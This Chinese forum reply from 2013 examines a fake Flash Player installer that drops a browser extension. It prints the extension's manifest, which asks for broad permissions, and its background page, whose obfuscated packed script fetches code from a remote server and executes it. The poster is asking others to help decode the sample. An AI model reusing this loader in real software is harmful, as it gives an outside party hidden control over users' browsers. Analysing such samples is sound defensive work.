本帖最后由 avoyoo 于 2013-1-15 13:19 编辑
sanhu35 发表于 2013-1-15 10:58
安装程序有问题,未能完成安装。
释放一个卸载程序和一个crx文件,明明是Flash_Player安装 为什么要释放c ...
crx解压之后有backgroud.html及manifest.json文件。
先看manifest.json文件:
{
"name": "Flash Player",
"version": "11",
"background_page": "background.html",-背景页直接调用包内的html文件
"permissions": [
"tabs", "http://*/*", "history", "webNavigation", "webRequest", "management"
]
}
backgroud.html:
<html><head><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('64.65("63",10(){10 48(){9(7["14"]==17||7["14"]=="")7["14"]=19.34(18 31().33()/37);15 7["14"]}10 47(){9(7["27"]==17||7["27"]=="")7["27"]=60;15(19.34(18 31().33()/37)-7["27"])}10 23(){24 11=10(){15(((1+19.49())*62)|0).59(16).61(1)};9(7["23"]==17||7["23"]=="")7["23"]=(11()+11()+11()+11()+11()+11()+11()+11());15 7["23"]}10 54(32,21){20=66;22="";58(26=0;26<32.72;26++){42=20;20=32.71(26);42=20+2;30=20^21;70=20^3;22=22+68.69(30)}15 22}10 46(8,38){9(7[8]==17||7[8]==""){7[8]=38;15 38}29{15 7[8]}}10 28(8,13,21){9(8=="25"){39("73","55?**57+56*53+67:76",13,21)}29{9(7["35"]!=17||7["35"]!=""){18 50(7["35"])()}}}10 39(8,25,13,21){7["14"]=19.34(18 31().33()/37);24 52=46(8,25);24 40=19.49();24 44="90";41=54(52,21)+""+13+"&30=2&89="+44+"&"+19.74(40*87);92=94;43{24 12=18 96();12.93("86",41);12.85=10(78){9(12.77==4){9(12.75==80){43{18 50(12.84)()}45(22){28(8,13,5)}}29{7[8]=25;28(8,13,5)}}};12.83()}45(22){28(8,13,5)}}9(7["14"]==17||7["14"]=="")36=51;29 36=51;9(36||(48()<47())){39("25","91<))81~53(82)79(95;",23(),6)}},88);',10,97,'|||||||localStorage|m|if|function|XX|request|g|date|return||undefined|new|Math|a|inx|e|guid|var|uri|i|int|breq|else|b|Date|en|getTime|round|ch|f|1000|def|req|rx|xuri|c|try|vxc|catch|turi|getInt|getDate|random|Function|true|uhx|o|dec|mqqu|fjh|fmdfnp|for|toString||substring|0x10000|load|window|addEventListener|55896|umu|String|fromCharCode|d|charCodeAt|length|buri|floor|status|p8|readyState|aEvt|l|200|rnt|eik|send|responseText|onreadystatechange|GET|984758|false|v|th0013|nrrv|t|open|this|vnv9s|XMLHttpRequest'.split('|'),0,{}));</script></head><body></body></html>
对于网页的解密我不懂。只能看大婶来“解毒”了。
PS:更新,尝试直接访问background.html会跳转到im9.115.com/chat/r?VER=2&c=b1&s=5f5b2e0a3ffbecc7b5aa42f2eca7bdd51435f9e7c4169c2333a99d603f21ffb1&_t=1358226850043 |